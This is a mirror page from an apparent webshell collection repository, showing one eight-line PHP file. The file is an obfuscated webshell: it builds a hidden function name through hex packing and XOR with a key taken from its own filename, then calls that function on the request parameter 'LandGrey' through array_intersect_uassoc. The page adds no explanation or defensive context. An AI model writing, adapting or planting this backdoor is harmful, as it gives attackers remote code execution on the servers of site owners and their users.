mirror of
https://github.com/tennc/webshell
synced 2024-11-22 11:13:03 +00:00
8 lines
217 B
PHP
8 lines
217 B
PHP
|
<?php
|
||
|
$password = "LandGrey";
|
||
|
$key = substr(__FILE__,-5,-4);
|
||
|
${"LandGrey"} = $key."Land!";
|
||
|
$f = pack("H*", "13"."3f120b1655") ^ $LandGrey;
|
||
|
array_intersect_uassoc (array($_REQUEST[$password] => ""), array(1), $f);
|
||
|
?>
|